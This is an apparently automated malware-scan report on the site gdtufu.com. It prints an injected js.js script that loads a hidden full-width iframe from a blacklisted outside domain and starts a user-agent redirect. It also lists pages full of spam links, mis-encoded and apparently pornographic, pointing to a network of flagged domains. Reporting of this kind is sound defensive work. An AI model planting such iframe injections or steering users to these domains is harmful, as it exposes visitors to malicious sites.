Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gdtufu.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.gdtufu.com/ | 200 OK Content-Length: 18815 Content-Type: text/html | clean |
http://www.gdtufu.com/js.js | 200 OK Content-Length: 1115 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.riyu958.com document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[527 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.riyu958.com/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.riyu958.com/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.riyu958.com/> | ||
http://www.gdtufu.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://js.users.51.la/15651134.js | 200 OK Content-Length: 1981 Content-Type: application/x-javascript | clean |
http://www.gdtufu.com/hspnr/ | 200 OK Content-Length: 4768 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hhcqw.com ...[3820 bytes skipped]... ><br /></li><li><img src="/pic/1379970939_1478.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.hhcqw.com/jqllsnh/" title="¼¤ÇéÂÒÂ×É«Å®º¢">¼¤ÇéÂÒÂ×É«Å®º¢</a><a href="http://frdict.com/hhp/" title="ºÝºÝÅö">ºÝºÝÅö</a><a href="http://www.gyshtgz.com/sjpwz/" title="Èý¼¶Æ¬ÍøÖ·">Èý¼¶Æ¬ÍøÖ·</a><a href="http://www.gdtufu.com/lgcrw/" title="Àǹú³ÉÈËÍø">Àǹú³ÉÈËÍø</a><a href="http://www.frdict.com/lsy/" title="ߣʦү">ߣʦү</a><a href="http://www.ftdcxx.com/ymdh/" title="ÒùÃñµ¼º½">ÒùÃñµ¼º½</a><a href="http://www.gyshtgz.com ...[1555 bytes skipped]... | ||
http://www.gdtufu.com/crsb/ | 200 OK Content-Length: 4798 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzhiec.com ...[4389 bytes skipped]... ÈËÃûµ¥</a><a href="http://fuyidz.com/sclzhw/" title="Ê®´ÎÀ²×ÛºÏÍø">Ê®´ÎÀ²×ÛºÏÍø</a><a href="http://fuyidz.com/tysdh/" title="ÌìÑÄÉ«µ¼º½">ÌìÑÄÉ«µ¼º½</a><a href="http://www.fuyidz.com/mtw/" title="ÃÛÌÒÍø">ÃÛÌÒÍø</a><a href="http://gdtufu.com/thszhyy/" title="ÌÒ»¨É«×ÛºÏÓ°Ôº">ÌÒ»¨É«×ÛºÏÓ°Ôº</a><a href="http://gyshtgz.com/sjpdq/" title="Èý¼¶Æ¬´óÈ«">Èý¼¶Æ¬´óÈ«</a><a href="http://gzhiec.com/sjw/" title="Èý¼¶Íø">Èý¼¶Íø</a><a href="http://ftdcxx.com/lg/" title="ߣ¹Ü">ߣ¹Ü</a><a href="http://www.cessgo.com/mmwyt/" title="ÃÃÃÃÎåÔÂÌì">ÃÃÃÃÎåÔÂÌì</a><a href="http://www.ftdcxx.com/crjqw/" title="³ÉÈ˼¤ÇéÍø">³ÉÈ˼¤ÇéÍø</a><a href="http://www.czgcjx.com/qsyszx/" title="ÇéÉ«ÒÕÊõÖÐÐÄ">ÇéÉ«ÒÕÊõÖÐÐÄ</a><a href="http://gyshtgz.com/xgsjdy/" title="Ïã¸ÛÈý¼¶µçÓ°">Ïã¸ÛÈý¼¶µçÓ°</a><a href="http://ftdcxx.com/gygsb/" ti ...[1015 bytes skipped]... | ||
http://www.gdtufu.com/eel/ | 200 OK Content-Length: 4717 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: ftdcxx.com ...[3781 bytes skipped]... "/><br /></li><li><img src="/pic/1379970769_1322.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://ftdcxx.com/qsdy/" title="ÇéÉ«µçÓ°">ÇéÉ«µçÓ°</a><a href="http://gyshtgz.com/ttltp/" title="͵͵ߣͼƬ">͵͵ߣͼƬ</a><a href="http://ftdcxx.com/ttlg/" title="͵͵ߣ¸Ä">͵͵ߣ¸Ä</a><a href="http://hhcqw.com/ggp/" title="¸ç¸çž">¸ç¸çž</a><a href="http://gzhiec.com/sgl/" title="É«¸çߣ">É«¸çߣ</a><a href="http://www.hhcqw.com/jrl/" title="¼ÑÈËߣ">¼ÑÈËߣ</a><a href="http://gyshtgz.com/gbl/" title="¸ç±Øߣ">¸ç±Øߣ</a>< ...[1542 bytes skipped]... | ||
http://www.gdtufu.com/semeimei/ | 200 OK Content-Length: 4700 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hhcqw.com ...[4040 bytes skipped]... l> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.czgcjx.com/lsq/" title="ÁñÉçÇø">ÁñÉçÇø</a><a href="http://gdtufu.com/kxsbzxdy/" title="¿ªÐÄÉ«²¥ÔÚÏßµçÓ°">¿ªÐÄÉ«²¥ÔÚÏßµçÓ°</a><a href="http://www.czgcjx.com/ggs/" title="¸ç¸çÉ«">¸ç¸çÉ«</a><a href="http://www.hhcqw.com/smm/" title="É«ÃÃÃÃ">É«ÃÃÃÃ</a><a href="http://gzhiec.com/xywyt/" title="åÐÒ£ÎåÔÂÌì">åÐÒ£ÎåÔÂÌì</a><a href="http://www.cessgo.com/gbz/" title="¸É°ØÖ¥">¸É°ØÖ¥</a><a href="http://www.qbzjm.com/gyg/" title="¸çÒª¸ã">¸çÒª¸ã</a><a href="http://www.ftdcxx.com/ass/" title="°®ÉÏÉ«">°®ÉÏÉ«</a><a href="http://frdict.com/sjyp/" title="Èý¼¶Ó°Æ¬">Èý¼¶Ó°Æ¬</a><a href="http://www.czgcjx.com/xxyy/" title="ÏþÏþÓ°Ôº">ÏþÏþÓ°Ôº& ...[1267 bytes skipped]... | ||
http://www.gdtufu.com/btsgc/ | 200 OK Content-Length: 4755 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.ftdcxx.com ...[3827 bytes skipped]... ><br /></li><li><img src="/pic/1366983482_9260.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.ftdcxx.com/gyshdg/" title="¸çҲɫºûµû¹È">¸çҲɫºûµû¹È</a><a href="http://www.gdtufu.com/kxswy/" title="¿ªÐÄÉ«ÎçÒ¹">¿ªÐÄÉ«ÎçÒ¹</a><a href="http://czgcjx.com/smm/" title="É«ßäßä">É«ßäßä</a><a href="http://www.ftdcxx.com/sks/" title="É«¿áÉ«">É«¿áÉ«</a><a href="http://www.qbzjm.com/ttl/" title="͵͵ߣ£±">͵͵ߣ£±</a><a href="http://cessgo.com/clsq/" title="²ÝÁôÉçÇø">²ÝÁôÉçÇø</a><a href="http://gyshtgz.com/dsn/" title="´óÉ«æ¤" ...[1534 bytes skipped]... | ||
http://www.gdtufu.com/gzqsw/ | 200 OK Content-Length: 4789 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: gzhiec.com ...[4349 bytes skipped]... "É«ÇéС˵Íø">É«ÇéС˵Íø</a><a href="http://www.gyshtgz.com/qswyt/" title="ÇéÉ«ÎåÔÂÌì">ÇéÉ«ÎåÔÂÌì</a><a href="http://www.czgcjx.com/sng/" title="É«Äá¹Ã">É«Äá¹Ã</a><a href="http://www.qbzjm.com/hsq/" title="ºÃÉ«ÆÞ">ºÃÉ«ÆÞ</a><a href="http://gyshtgz.com/cclsj/" title="²Ü²éÀí Èý¼¶">²Ü²éÀí Èý¼¶</a><a href="http://frdict.com/sjnx/" title="Èý¼¶Å®ÐÇ">Èý¼¶Å®ÐÇ</a><a href="http://gzhiec.com/sqjdkb/" title="É«Çé»ùµØ¿ì²¥">É«Çé»ùµØ¿ì²¥</a><a href="http://gdtufu.com/hhs/" title="ºÝºÝÉ«">ºÝºÝÉ«</a><a href="http://hhcqw.com/gyshdgylw/" title="¸çҲɫºûµû¹ÈÓéÀÖÍø">¸çҲɫºûµû¹ÈÓéÀÖÍø</a><a href="http://www.ftdcxx.com/sljzy/" title="É«ÀǼ¯ÖÐÓª">É«ÀǼ¯ÖÐÓª</a><a href="http://hhcqw.com/llstp/" title="ߣߣÉçͼƬ">ߣߣÉçͼƬ</a><a href="http://gyshtgz.com/llsbdyy/" title="ߣߣÉä°Ù¶ÈÓ°Òô">ߣߣÉä°Ù¶ÈÓ°Òô</a><a href ...[1046 bytes skipped]... | ||
http://www.gdtufu.com/bbkx/ | 200 OK Content-Length: 4773 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hhcqw.com ...[3778 bytes skipped]... "/><br /></li><li><img src="/pic/1379970769_2860.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://hhcqw.com/dyr/" title="´óÒ¯ÈÕ">´óÒ¯ÈÕ</a><a href="http://qbzjm.com/crsb/" title="³ÉÈËÉ«²¥">³ÉÈËÉ«²¥</a><a href="http://www.gdtufu.com/bdyjythy/" title="²¨¶àÒ°½áÒÂÌ캣Òí">²¨¶àÒ°½áÒÂÌ캣Òí</a><a href="http://hhcqw.com/srgw/" title="É«È˸óÍø">É«È˸óÍø</a><a href="http://www.fuyidz.com/ssfzh/" title="˽ɫ·¿×ÛºÏ">˽ɫ·¿×ÛºÏ</a><a href="http://czgcjx.com/yyw/" title="ÒùÒùÍø">ÒùÒùÍø</a><a href="http://www.fuyidz.com/jqgcrw/" titl ...[1602 bytes skipped]... | ||
http://www.gdtufu.com/msw/ | 200 OK Content-Length: 4748 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hhcqw.com ...[3947 bytes skipped]... 8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://gyshtgz.com/ttjqwylb/" title="æÃæü¤ÇéÎåÔÂÁ¬²¥">æÃæü¤ÇéÎåÔÂÁ¬²¥</a><a href="http://czgcjx.com/ccczhw/" title="²å²å²å×ÛºÏÍø">²å²å²å×ÛºÏÍø</a><a href="http://www.hhcqw.com/zhqs/" title="×ÛºÏÇéÉ«">×ÛºÏÇéÉ«</a><a href="http://www.qbzjm.com/wml/" title="ÎÒÃÇߣ">ÎÒÃÇߣ</a><a href="http://www.hhcqw.com/omsjp/" title="Å·ÃÀÈý¼¶Æ¬">Å·ÃÀÈý¼¶Æ¬</a><a href="http://czgcjx.com/ssn/" title="É«É«ÄÐ">É«É«ÄÐ</a><a href="http://www.fuyidz.com/yycrsq/" title="ÒÀÒÀ³ÉÈËÉçÇø">ÒÀÒÀ³ÉÈËÉçÇø</a><a href="http://www.gdtufu.com/dssbb/" title="µÚËÄÉ«²¥²¥">µÚËÄÉ«²¥²¥</a><a href="http://cessgo.com/cpvip/" titl ...[1408 bytes skipped]... | ||
http://www.gdtufu.com/crsjp/ | 200 OK Content-Length: 4810 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.ftdcxx.com ...[3909 bytes skipped]... " alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.gdtufu.com/sjp/" title="Èý¼¶Æ¬">Èý¼¶Æ¬</a><a href="http://www.ftdcxx.com/ssfb/" title="ËÄÉ«·¿²¥">ËÄÉ«·¿²¥</a><a href="http://www.hhcqw.com/hgl/" title="º«¹úߣ">º«¹úߣ</a><a href="http://cessgo.com/jssajqw/" title="¾ÛÉ«Éî°®¼¤ÇéÍø">¾ÛÉ«Éî°®¼¤ÇéÍø</a><a href="http://gyshtgz.com/aqyawy/" title="°³È¥Ò²°®ÎåÔÂ">°³È¥Ò²°®ÎåÔÂ</a><a href="http://cessgo.com/rhnyyyl/" title="ÈÕº«Å®ÓÅҹҹߣ">ÈÕº«Å®ÓÅҹҹߣ</a><a href="http://cessgo.com/1024zxdz/" title="1024×îеØÖ·">1024×îеØÖ·</a><a href="htt ...[1507 bytes skipped]... | ||
http://www.gdtufu.com/lrrqwq/ | 200 OK Content-Length: 4734 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.hhcqw.com ...[3816 bytes skipped]... ><br /></li><li><img src="/pic/1379970875_4072.jpg" alt=""/><br /></li></div></div> </div> <div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.hhcqw.com/snm/" title="É«ÄãÃÃ">É«ÄãÃÃ</a><a href="http://hhcqw.com/hhl/" title="ºÝºÜߣ">ºÝºÜߣ</a><a href="http://www.ftdcxx.com/stp/" title="ɫͼƬ">ɫͼƬ</a><a href="http://cessgo.com/wytmm/" title="ÎåÔÂÌìÃÃÃÃ">ÎåÔÂÌìÃÃÃÃ</a><a href="http://hhcqw.com/sclzww/" title="Ê®´ÎÀ²ÖÐÎÄÍø">Ê®´ÎÀ²ÖÐÎÄÍø</a><a href="http://frdict.com/avlt/" title="avÂÛ̳">avÂÛ̳</a><a href="http://cessgo.com/llgzxyy/" title="ߣߣ¹ÜÔÚÏßÓ°Ôº">ߣ ...[1525 bytes skipped]... | ||
http://www.gdtufu.com/yqdqh/ | 200 OK Content-Length: 4727 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.gzhiec.com ...[3943 bytes skipped]... ;div class="box mb8 clearfix"> <ul class="title2">Ïà¹ØÄÚÈÝ</ul> </div> <div class="box mb8 clearfix"> <ul class="title2">ÓÑÇéÁ´½Ó</ul> <ul class="content borderblue linkbox clearfix"><a href="http://www.czgcjx.com/ysw/" title="ÒùÉ«Íø">ÒùÉ«Íø</a><a href="http://qbzjm.com/llsbdyy/" title="ߣߣÉä°Ù¶ÈÓ°Òô">ߣߣÉä°Ù¶ÈÓ°Òô</a><a href="http://www.gzhiec.com/crsbsp/" title="³ÉÈËÉ«°ÉÊÓƵ">³ÉÈËÉ«°ÉÊÓƵ</a><a href="http://hhcqw.com/dyr/" title="´óÒ¯ÈÕ">´óÒ¯ÈÕ</a><a href="http://frdict.com/ybl/" title="Ò¹±Øߣ">Ò¹±Øߣ</a><a href="http://gyshtgz.com/smyy/" title="ÉñÂíÓ°Ôº">ÉñÂíÓ°Ôº</a><a href="http://www.hhcqw.com/lbj/" title="ߣ°×½ð">ߣ°×½ð</a><a href="http://www.gdtufu.com/crsz/" title="³ÉÈËÉ«Õ¾">³ÉÈËÉ«Õ¾</a><a href="http://gzhiec.com/qsysp/" title="ÇéÉ«ÒÕÊõƬ">ÇéÉ« ...[1390 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gdtufu.com
Result:
GET / HTTP/1.1
Host: gdtufu.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gdtufu.com
Referer: http://www.google.com/search?q=gdtufu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gdtufu.com
Referer: http://www.google.com/search?q=gdtufu.com
Result:
The result is similar to the first query. There are no suspicious redirects found.